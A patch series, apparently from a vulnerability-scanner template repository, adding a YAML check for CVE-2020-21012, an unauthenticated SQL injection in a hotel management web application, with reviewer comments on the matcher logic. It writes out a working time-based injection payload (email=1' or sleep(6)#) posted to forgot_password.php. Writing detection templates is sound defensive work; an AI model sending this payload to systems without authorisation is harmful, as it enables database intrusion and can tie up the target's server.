From c8a1eb5e7e2c33182237339bb21f40850265893c Mon Sep 17 00:00:00 2001
From: edoardottt
Date: Fri, 30 Sep 2022 16:26:08 +0200
Subject: [PATCH 1/4] Add CVE-2020-21012
---
cves/2020/CVE-2020-21012.yaml | 33 +++++++++++++++++++++++++++++++++
1 file changed, 33 insertions(+)
create mode 100644 cves/2020/CVE-2020-21012.yaml
diff --git a/cves/2020/CVE-2020-21012.yaml b/cves/2020/CVE-2020-21012.yaml
new file mode 100644
index 0000000000..7d8b2e01e4
--- /dev/null
+++ b/cves/2020/CVE-2020-21012.yaml
@@ -0,0 +1,33 @@
+id: CVE-2020-21012
+
+info:
+ name: Sourcecodester Hotel and Lodge Management System 2.0 - SQL Injection
+ author: edoardottt
+ severity: critical
+ description: |
+ Sourcecodester Hotel and Lodge Management System 2.0 is vulnerable to unauthenticated SQL injection and can allow remote attackers to execute arbitrary SQL commands via the email parameter to the edit page for Customer, Room, Currency, Room Booking Details, or Tax Details.
+ reference:
+ - https://github.com/hitIer/web_test/tree/master/hotel
+ - https://nvd.nist.gov/vuln/detail/CVE-2020-21012
+ classification:
+ cve-id: CVE-2020-21012
+ tags: cve,sourcecodester,cve2020,sqli
+
+requests:
+ - raw:
+ - |
+ POST /forgot_password.php HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: application/x-www-form-urlencoded
+
+ btn_forgot=1&email=1' or sleep(5)%23
+
+ matchers-condition: and
+ matchers:
+ - type: dsl
+ dsl:
+ - 'duration>=5'
+
+ - type: status
+ status:
+ - 200
\ No newline at end of file
From 89aeb451d88b426a5522855e81dac5ed678865cf Mon Sep 17 00:00:00 2001
From: vrenzolaverace
Date: Sat, 1 Oct 2022 15:54:56 +0200
Subject: [PATCH 2/4] Update CVE-2020-21012.yaml
---
cves/2020/CVE-2020-21012.yaml | 4 ++--
1 file changed, 2 insertions(+), 2 deletions(-)
diff --git a/cves/2020/CVE-2020-21012.yaml b/cves/2020/CVE-2020-21012.yaml
index 7d8b2e01e4..551c9681ec 100644
--- a/cves/2020/CVE-2020-21012.yaml
+++ b/cves/2020/CVE-2020-21012.yaml
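Review bot: The `description` in the PATCH 1/4 hunk says the injection is reached through the email parameter of the edit pages (Customer, Room, Currency, Room Booking Details, Tax Details), while the request in the same hunk posts `email` to `/forgot_password.php`, so a reader cannot tell whether the probe exercises the documented entry point or a different one. If the password-reset form is what was tested, say so in the description, for example by adding `The check sends a time-based probe to the email field of forgot_password.php.` The `classification` block also carries only `cve-id`; adding `cwe-id: CWE-89` would let the finding be grouped with other SQL injection results.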
@@ -20,7 +20,7 @@ requests: Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded - btn_forgot=1&email=1' or sleep(5)%23 + btn_forgot=1&email=1%27%20or%20sleep(5)%23 matchers-condition: and matchers: @@ -30,4 +30,4 @@ requests: - type: status status: - - 200 \ No newline at end of file + - 200 From ea24fc5290d6c9f7a20e4efe856f4f83dd807fbc Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Tue, 15 Nov 2022 16:45:00 +0530 Subject: [PATCH 3/4] Update CVE-2020-21012.yaml --- cves/2020/CVE-2020-21012.yaml | 17 +++++++++-------- 1 file changed, 9 insertions(+), 8 deletions(-) diff --git a/cves/2020/CVE-2020-21012.yaml b/cves/2020/CVE-2020-21012.yaml index 551c9681ec..4e6f9e372b 100644 --- a/cves/2020/CVE-2020-21012.yaml +++ b/cves/2020/CVE-2020-21012.yaml @@ -8,10 +8,13 @@ info: Sourcecodester Hotel and Lodge Management System 2.0 is vulnerable to unauthenticated SQL injection and can allow remote attackers to execute arbitrary SQL commands via the email parameter to the edit page for Customer, Room, Currency, Room Booking Details, or Tax Details. reference: - https://github.com/hitIer/web_test/tree/master/hotel + - https://www.sourcecodester.com/php/13707/hotel-and-lodge-management-system.html - https://nvd.nist.gov/vuln/detail/CVE-2020-21012 classification: cve-id: CVE-2020-21012 - tags: cve,sourcecodester,cve2020,sqli + metadata: + verified: true + tags: cve,cve2020,hotel,sqli requests: - raw: @@ -20,14 +23,12 @@ requests: Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded - btn_forgot=1&email=1%27%20or%20sleep(5)%23 + btn_forgot=1&email=1%27%20or%20sleep(6)%23 - matchers-condition: and matchers: - type: dsl dsl: - - 'duration>=5' - - - type: status - status: - - 200 + - 'duration>=6' + - 'status_code == 200' + - 'contains(body, "Hotel Booking System")' + condition: and From cea1f4e75f5906b7dfca52697cfd6afd4f888f6f Mon Sep 17 00:00:00 2001 
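Review bot: The rewritten matcher in PATCH 3/4 (`@@ -20,14 +23,12 @@`) still decides on a single timing sample, so `duration>=6` together with `status_code == 200` and the page-title check will also fire on a patched instance of the same application that merely answers slowly. Because the injected expression is `or sleep(6)`, the delay is probably applied per row the query examines rather than once (inferred; the server-side query is not visible here), so on a populated table the response can run past the scanner's request timeout, which shows up as a missed detection, and can hold a database connection on the scanned host for much longer than six seconds. Document this above the matcher, e.g. `# time-based check: re-run to confirm; delay may scale with table size`, and treat a hit as a lead to verify rather than a confirmed finding, even with `verified: true` set in the first hunk of this patch.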
From: Prince Chaddha Date: Wed, 16 Nov 2022 14:06:26 +0530 Subject: [PATCH 4/4] Update CVE-2020-21012.yaml --- cves/2020/CVE-2020-21012.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2020/CVE-2020-21012.yaml b/cves/2020/CVE-2020-21012.yaml index 4e6f9e372b..e7e4ed73ba 100644 --- a/cves/2020/CVE-2020-21012.yaml +++ b/cves/2020/CVE-2020-21012.yaml @@ -14,7 +14,7 @@ info: cve-id: CVE-2020-21012 metadata: verified: true - tags: cve,cve2020,hotel,sqli + tags: cve,cve2020,hotel,sqli,unauth requests: - raw: